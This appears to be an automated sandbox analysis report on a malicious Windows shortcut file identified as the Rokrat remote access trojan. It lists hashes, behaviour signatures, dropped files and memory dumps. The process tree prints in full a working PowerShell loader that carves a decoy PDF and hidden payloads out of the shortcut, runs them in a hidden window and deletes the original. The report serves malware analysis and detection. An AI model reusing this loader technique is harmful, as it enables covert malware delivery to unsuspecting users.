Analysis

  • max time kernel
    122s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    03-04-2024 06:48

General

  • Target

    b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.lnk

  • Size

    56.2MB

  • MD5

    358122718ba11b3e8bb56340dbe94f51

  • SHA1

    0c61effe0c06d57835ead4a574dde992515b9382

  • SHA256

    b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56

  • SHA512

    7c4beb041fde779e21b01f26c571026b1ba38a24002b89bc57ca6cf2bc0e6e0ff38f6a100a30e3622eff403ba7ebb572839b033f81b0663939666a443184eb01

  • SSDEEP

    98304:xe9nAp+et8sMdP7jKFYM0bI1/c/zNYP2wn:xIAp+etaZvdm/wG2wn

Score
10/10

Malware Config

Signatures

  • Detect Rokrat payload 2 IoCs
  • Rokrat

    Rokrat is a remote access trojan written in c++.

  • Blocklisted process makes network request 10 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • HTTP links in PDF interactive object 1 IoCs

    Detects HTTP links in interactive objects within PDF files.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2164
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      PID:2564
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
        3⤵
          PID:2484
        • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
          3⤵
          • Deletes itself
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2252
          • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
            "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.pdf"
            4⤵
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            PID:2344
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\price.bat""
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1704
            • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'para.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
              5⤵
              • Blocklisted process makes network request
              • Checks BIOS information in registry
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1672
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zedhzvtx.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1644
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB57B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB57A.tmp"
                  7⤵
                    PID:2304
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mna09cll.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1620
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB6A3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB6A2.tmp"
                    7⤵
                      PID:1472
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u4brgtko.cmdline"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2684
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB74F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB74E.tmp"
                      7⤵
                        PID:1492
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\8cfsy7fs.cmdline"
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1400
                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB868.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB867.tmp"
                        7⤵
                          PID:2040

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\8cfsy7fs.dll

              Filesize

              3KB

              MD5

              922719440238cfea49440ff99eb01286

              SHA1

              cf4c7d4527602c5e5ce327f292b7656fade0ed9f

              SHA256

              4aabc5626609d7aa426114e6ba8fd32fbb17c526951b5cc657916c4b595f03ed

              SHA512

              7e1bdeeed1395229bfb2a783c1d11f6828e7b9d120084083aa88060c121b226c2685a0fa0d50916fc27d117928ab71b1c0da9b4235cf19819435cccfb0a4d623

            • C:\Users\Admin\AppData\Local\Temp\8cfsy7fs.pdb

              Filesize

              7KB

              MD5

              4d3412fc125beba0573635a7f44ce6f1

              SHA1

              a268441b723cc49a20b28079d92c9bbeb5bc3f41

              SHA256

              91abee52ad9616e90cc1fcfa327a0e578c5cdfb91d20e68808e6d645ac61f7dd

              SHA512

              e083ee71c3d5404a0648b38774a15a0e30232ebb57aa12d12ab9dbab87a1dc9088639e519d90b042b1ec2f81e838d92566bf9b33633bb154944d056a86529bd4

            • C:\Users\Admin\AppData\Local\Temp\RESB57B.tmp

              Filesize

              1KB

              MD5

              2af77bdd4c39802c7ff474ceae488e0f

              SHA1

              7d5ddce951bf3b1c275203e0fa190580a53e04f2

              SHA256

              3472b1c0c739dab8fca40c2edb658d1ba48676c5db55de9dec9ae5ea89d7c79f

              SHA512

              b49715594842833131080e13660208d786529200acb46f17516776bc48592379f9ba34f0659d1d1a34634659c2523d3617e606d1cbf18011a3e22cfef65af364

            • C:\Users\Admin\AppData\Local\Temp\RESB6A3.tmp

              Filesize

              1KB

              MD5

              d9d6fa5a045addff807c44207cbbcbe1

              SHA1

              3056c94167ae94c9165ee39eef281cb2a0419091

              SHA256

              37a4db07d45d27e4ddf56ac9b575678cc0ee3a7737f208b8772fd590795dadea

              SHA512

              52038243188c39b74a00a2d43904deaba84d81d9e7f7a34ba693f824b6baf5af97bcd124c64afe0ad591ffeab2f7bedb8cd34d40769b1912d603d88d5567d51f

            • C:\Users\Admin\AppData\Local\Temp\RESB74F.tmp

              Filesize

              1KB

              MD5

              d7966756c0ef520d57410ecf2efd2ebc

              SHA1

              0fce8f1ffc8be85191e4b02b29765d1adf8f3782

              SHA256

              1a3f60cddd7f466ea18caea590ec655d107fda292ae1f0007b129ff020c2f652

              SHA512

              f1103bb537389f0c25444c355485d83dfcb60d3fa9772ec6ee1c5f73912e26ba6f3a93d08d6a7f232a63c611d55828c92f5b86c8ed91256df6371f5b216f4a82

            • C:\Users\Admin\AppData\Local\Temp\RESB868.tmp

              Filesize

              1KB

              MD5

              f58ccc322d93dbc6387e3f78c8c6d421

              SHA1

              3238cd6531ed79cffcdc997711da7b33fafee468

              SHA256

              de2ac9f44ab3bce245af92eec56fe20461d59263bef7847c09dfda149f9e5790

              SHA512

              e2c2e82205dbf3d587abde8eb00a2eebef959f9a70b3c474a9c646c03d20ada76415ad0b92d35dc8adcd979c5cbf768528e6f6c510f40e2ece1b2afa3c5ccf26

            • C:\Users\Admin\AppData\Local\Temp\b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.pdf

              Filesize

              4.7MB

              MD5

              29ec187f2ed2eca0953dca0a68ac3722

              SHA1

              a20557b2e4a8b2c5e8a735c5d2f30aeaad01726e

              SHA256

              81269c3c41d957765314a1704e0ea6cdf9666eab729597207fd1cc844c749beb

              SHA512

              890a37f5e8fbe4d1cef6d52ec0c7b6dbf378f3545a59cdef1d796fee0aec8662564cdfd86f019f8e6bd60d8c678b72746200a1ce917a867bd21546ed06ac2bc8

            • C:\Users\Admin\AppData\Local\Temp\mna09cll.dll

              Filesize

              3KB

              MD5

              5908495ed032b3a55f98cc6a265330ce

              SHA1

              cf76b4ae60c05a17bac8693421bbe80ef88fa130

              SHA256

              43cb361c7679a9b9028ac6eba95341144d52ba263e77a35c742ff282f6850ba4

              SHA512

              7e2667cdda3ee2ce586011eb69a718e4344e82b04e746fb521a6cda9393f342725908b36921c22ee49f691cda59331518b25276a9d70eec64b7f104b0a4b3601

            • C:\Users\Admin\AppData\Local\Temp\mna09cll.pdb

              Filesize

              7KB

              MD5

              9710557f697d2e32bbcffdc897d87325

              SHA1

              e3fc98569f131275281018b24b3c53f3b206785c

              SHA256

              2f44b7377532e12f5b747a304b95bae829265743b8257d0e2b8a821b69930096

              SHA512

              f550fc2c194f7d660fcf809fdd5fd489075aaf422f16cfa4f8503035aac4a274ed6694246d3e225f59d7c18d2145b8f1df7c605bee8c5ed94b44c34dbdba3281

            • C:\Users\Admin\AppData\Local\Temp\para.dat

              Filesize

              1KB

              MD5

              655f58dcd7cd8bd996076ad4b492ae00

              SHA1

              7d69d7926de1ad560f0d002bd768eb182177cca4

              SHA256

              4e9d83e270910fa2610a2bdb0fef2bc2f5a2c257ce8c9eb5ba3f73eb051f5cf7

              SHA512

              87575186d8674c4be4f736db9b008b5ef975a21b60d38a635ad874dd399b5263fc6cba94e6010681c6262241df3b1f3074411c815121141414727c326d70e204

            • C:\Users\Admin\AppData\Local\Temp\price.bat

              Filesize

              311B

              MD5

              f5787b3e60fad2b255ebc54d0ce747dc

              SHA1

              830705c5417f11c730cd8bbde4a2a709671cc11d

              SHA256

              a43f7b080c30816997fc15589f904365917f30ae15441b22fbda11aec2ddf1c0

              SHA512

              1e702414e37c90da42457295653e4df5a64208476206e001d8c23edfe5b8e7e5145672b5e0abf5bc4667e4e059735066db4c0a6a04cca259eb96e7755ce6cd8f

            • C:\Users\Admin\AppData\Local\Temp\u4brgtko.dll

              Filesize

              3KB

              MD5

              54e016f798c529722e2ccc7082fc5278

              SHA1

              2e5f7105c02fc1f68ac50f2185d4cbbc65758be1

              SHA256

              88ea7886752960bb92fc952435303a9d469e0228f8fedf84676021c97b75eb09

              SHA512

              f5dc2d2b19c8a465d1db996fc4e3b5f150a0d218a407b0a41d21de0c362d9a1d42ef3bff30427e53b8145376291de566d39e0a1d3acb5920b690cea8379463cc

            • C:\Users\Admin\AppData\Local\Temp\u4brgtko.pdb

              Filesize

              7KB

              MD5

              38a5a1c4f18dda8eaff4198a3fa2385c

              SHA1

              6c168d6ee84dcc73eba2bca314982b2ab74d8918

              SHA256

              f69eb6462f5cdbd1a40f6a3e7bab6acf86dde9bf1f938cef4fc8c8d52c852637

              SHA512

              a0575e8b60c8e5f37efd55d29684014d334f66274d684fdf3e9551ca69a1a61280de43fee714ab980870730568e4c5f2e182112379b8a2147a35554ece25ef6d

            • C:\Users\Admin\AppData\Local\Temp\zedhzvtx.dll

              Filesize

              3KB

              MD5

              93d3485b5a8ec47fccff2dfb4d41ace5

              SHA1

              19bc1a3780537d44411bf461480e68db0fc73c2b

              SHA256

              eee100a016763d8d120f6e23ab499849900474999ceead93b992d7c7cd92faab

              SHA512

              a35dd0542a531b2e3cc906696d189dbab88f05e8f7b2c76e8b0afc0af64259b8b7700618ae9d57a73ee490168abefcaf5b17b4e04d96be4693b632765cee7de2

            • C:\Users\Admin\AppData\Local\Temp\zedhzvtx.pdb

              Filesize

              7KB

              MD5

              17ede20e9ae1baf3f48f50a1f9506e89

              SHA1

              3c09002258dfb3c20eb6b9ccbb1f2d78465c3e49

              SHA256

              329aead031765b89fd5cf841952729505c34100a4be953e94f6f57753c7fa6cc

              SHA512

              6fba6afad2c9be705e02bedc35cbc3ffe73800e5b66497a9fdcc70f3c76bbf3ef6eb6967e013273ee2825f21e57bbdb7feaa78015596e2e6be278266b120479c

            • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

              Filesize

              3KB

              MD5

              bcd50d58485ca106ba167df3faf25297

              SHA1

              c48f8736d3593382930dd79dbab8b5920dd672c4

              SHA256

              a878184dded4a8920278946c8a3c3574c3fb68adeddd93219704a962f6ed191c

              SHA512

              29836e4cd7090c9ffee776768653b3693a468a64db5f1c7dcde96e43a6cb79ddf46ad3b0e6ec22606a29abf095b882d087ed00955623728b47f75753ddbbb1ea

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

              Filesize

              7KB

              MD5

              0605afcfd8cda9195829d80308f6b8c5

              SHA1

              db6c88cf6ae163c140c33680d4d00183b4e8654b

              SHA256

              8cb36c5be477de39c0602e590e79bb5e07d62ac94f9ff924382d8afd43a30c51

              SHA512

              f887d0384a8a8565a8c69438cd75f99a62bdbd867e73aaeb822c2b2eddbc378e1bdc3dc8650c45c8897520cfd905fc48a24a381e74e783d79eaeed19c4aadcc4

            • C:\Users\Public\panic.dat

              Filesize

              869KB

              MD5

              a043b3a2af9db6173e3a39b5c501a9bd

              SHA1

              4250f3855e53ccf755f8a05b1998f55dfa4b2c0e

              SHA256

              dc6ca2e9ce800245a65715647bb1614c35632f270d1879e796472e786cdfc0fc

              SHA512

              a667c8521589e96ba57b2ae6e429f43a352c36968edb4cadf57500a1a5e39511b3e7109bb2c372b9567c8e50777cfc71f0cb8150f2782a6a8ac9d90222f802f5

            • \??\c:\Users\Admin\AppData\Local\Temp\8cfsy7fs.0.cs

              Filesize

              259B

              MD5

              560e1b883a997afcfa3b73d8a5cddbc1

              SHA1

              2905f3f296ac3c7d6a020fb61f0819dbea2f1569

              SHA256

              e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea

              SHA512

              041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635

            • \??\c:\Users\Admin\AppData\Local\Temp\8cfsy7fs.cmdline

              Filesize

              309B

              MD5

              0d51d8fe866f53dae84687afdf6aba00

              SHA1

              9ec1fdb93e94da91333aa09fd75d0caf628435c8

              SHA256

              f6046b17041eb8b4ee191f3a9a31e87520eb801dece86cba5d06d103f8674fbf

              SHA512

              253e333d6c4795eca277ca1b713c9ed8ade8b417d0b9b2b27dba7d6a64f33c0849dbc214606e8a4790144968d8eee0b886ef4fefcccfea97bfe466c367ad8bac

            • \??\c:\Users\Admin\AppData\Local\Temp\CSCB57A.tmp

              Filesize

              652B

              MD5

              32810f2c7d9e34fa15d4e019ef53fc72

              SHA1

              fc01c7f794dbf96702a170e2e952449bee9c3789

              SHA256

              38e9c8c205c4b09c0271f4f48221ba682e2be6b6842ad915d937b4262623ec3f

              SHA512

              ff39963c55fec08bbd38a4cd92c6ac5ebc70396828cd04c1eeae8fe9ed259337dd49d63fbe28da5f252a063d1ec2b9db95f07fccbd9818f5482e0e0a6c525c17

            • \??\c:\Users\Admin\AppData\Local\Temp\CSCB6A2.tmp

              Filesize

              652B

              MD5

              973960eda188be2514bae1cfe5af749f

              SHA1

              1dbe259fc3998a373a53065f5eca43f73d532864

              SHA256

              eac495c29ecf7bf5357c2ba7aae89654f2ac006f77abfd68b601386a2b91e241

              SHA512

              f551b4fc202bc890e9eb2a097642bfc3c48a6059973a747b75125d86f0caae062a7b6037a2ced2656111e3b2b225e7711adc0083955733df50638a8e1f4e9750

            • \??\c:\Users\Admin\AppData\Local\Temp\CSCB74E.tmp

              Filesize

              652B

              MD5

              85fd65fd1e8db8f35c90ed95f4627662

              SHA1

              136aec2a0a9486d0fe7f3f0571e297418ca0fde4

              SHA256

              0e8e8da81e23b9537194edf1f0f58a43316dc94331e968936d9a006f769126c8

              SHA512

              2ae5e357605097c856cb5cdd09230ede7411d2a1fd53bc9d0b9d65a161d1f78a75613202a8da6c24c39fc9ce1f582706e584f79f3c204f83accedabf902a5d1a

            • \??\c:\Users\Admin\AppData\Local\Temp\CSCB867.tmp

              Filesize

              652B

              MD5

              e86d5110e9b64a2cd729e88ec6a34fc2

              SHA1

              d383e40a0c07ff7a63529bd608e26fe41b6e9f75

              SHA256

              562d5ae6b17ca803904e790656967cb6f8138020d32379be5d26cfbaa2fc3765

              SHA512

              55d4b0aabe4b34a8925ba2bb50cbce66c722a36fc573396d673585bedd696b9085bf1829848f64084f23e9e444e4e3c416b032029cab185d5ca523b94973a3ca

            • \??\c:\Users\Admin\AppData\Local\Temp\mna09cll.0.cs

              Filesize

              272B

              MD5

              4de985ae7f625fc7a2ff3ace5a46e3c6

              SHA1

              935986466ba0b620860f36bf08f08721827771cb

              SHA256

              53d5aecb149a00bc9c4fac5feb8e5feddf5c83986c12d5fef1c3ddd104b09004

              SHA512

              067916a8d16d322d72901baf3a369be43c99780961ccd306c171bf7ded06e3a13cf69c7fa0cd26c7fa181d87fc0e870f86d274098854a56346ca9272c0b99393

            • \??\c:\Users\Admin\AppData\Local\Temp\mna09cll.cmdline

              Filesize

              309B

              MD5

              81e45a3dac9a3140feb93b8aeda8bb73

              SHA1

              763627d90ad85879ac471c63d456075948042a03

              SHA256

              212d89ff734617ba813d9db922a9751949df0615f7a39906ab8abb8d2549ee5f

              SHA512

              b82299a84868ad4ed70a241a09a1aef3ac40efda0e2f0f4317e797113ac9b3d0950eddd02b09c1dd84f2c6955e7ba8f49ce77de0f23ecaa2d02910421bd0beef

            • \??\c:\Users\Admin\AppData\Local\Temp\u4brgtko.0.cs

              Filesize

              286B

              MD5

              b23df8158ffd79f95b9bddd18738270b

              SHA1

              79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

              SHA256

              856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

              SHA512

              e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

            • \??\c:\Users\Admin\AppData\Local\Temp\u4brgtko.cmdline

              Filesize

              309B

              MD5

              47dbb5539012787694f0c61c4e6e7d52

              SHA1

              807681cb0025537bdd261031cbb23d60a6104ba3

              SHA256

              a063830c929613ad99222c1223a97449828a8294363cf01685ef7f2e950e224b

              SHA512

              6630bcad92744ab211ee1b970e860aeaf2078b6422175e18850b261e2d4ffaea5c60f8334619a5164be8cddece7b79c81cff687d0f86fb36e7c41fd9f6768209

            • \??\c:\Users\Admin\AppData\Local\Temp\zedhzvtx.0.cs

              Filesize

              249B

              MD5

              69ecfeb3e9a8fb7890d114ec056ffd6d

              SHA1

              cba5334d2ffe24c60ef793a3f6a7f08067a913db

              SHA256

              0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

              SHA512

              be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

            • \??\c:\Users\Admin\AppData\Local\Temp\zedhzvtx.cmdline

              Filesize

              309B

              MD5

              1b0b6b3d2c9f4fe4ae90cf729f821135

              SHA1

              82fd972ccf023630d8c0fe0e8523e73aa345c396

              SHA256

              cdc1be472775493d18d6fa8a027f745327b82f678c667eae31cf79b1af68c509

              SHA512

              e1cac324ff0f4296e27217ffbbbaa427d5f77c1a63c4750bc8c9743633ebc206867d28d20a0591b7b40a350d0c339e3d5c2dd9cb704d91827221e919ec7fd54e

            • memory/1400-133-0x0000000002060000-0x00000000020A0000-memory.dmp

              Filesize

              256KB

            • memory/1620-101-0x0000000001EB0000-0x0000000001EF0000-memory.dmp

              Filesize

              256KB

            • memory/1644-85-0x0000000001FF0000-0x0000000002030000-memory.dmp

              Filesize

              256KB

            • memory/1672-60-0x0000000074720000-0x0000000074CCB000-memory.dmp

              Filesize

              5.7MB

            • memory/1672-59-0x0000000074720000-0x0000000074CCB000-memory.dmp

              Filesize

              5.7MB

            • memory/1672-144-0x00000000052D0000-0x00000000053AA000-memory.dmp

              Filesize

              872KB

            • memory/1672-145-0x00000000052D0000-0x00000000053AA000-memory.dmp

              Filesize

              872KB

            • memory/1672-146-0x000000000C180000-0x000000000C263000-memory.dmp

              Filesize

              908KB

            • memory/1672-147-0x000000000C180000-0x000000000C263000-memory.dmp

              Filesize

              908KB

            • memory/1672-148-0x0000000074720000-0x0000000074CCB000-memory.dmp

              Filesize

              5.7MB

            • memory/2252-61-0x0000000074720000-0x0000000074CCB000-memory.dmp

              Filesize

              5.7MB

            • memory/2252-38-0x0000000074720000-0x0000000074CCB000-memory.dmp

              Filesize

              5.7MB

            • memory/2252-41-0x0000000002760000-0x00000000027A0000-memory.dmp

              Filesize

              256KB

            • memory/2252-40-0x0000000002760000-0x00000000027A0000-memory.dmp

              Filesize

              256KB

            • memory/2252-39-0x0000000074720000-0x0000000074CCB000-memory.dmp

              Filesize

              5.7MB

            • memory/2684-117-0x00000000002C0000-0x0000000000300000-memory.dmp

              Filesize

              256KB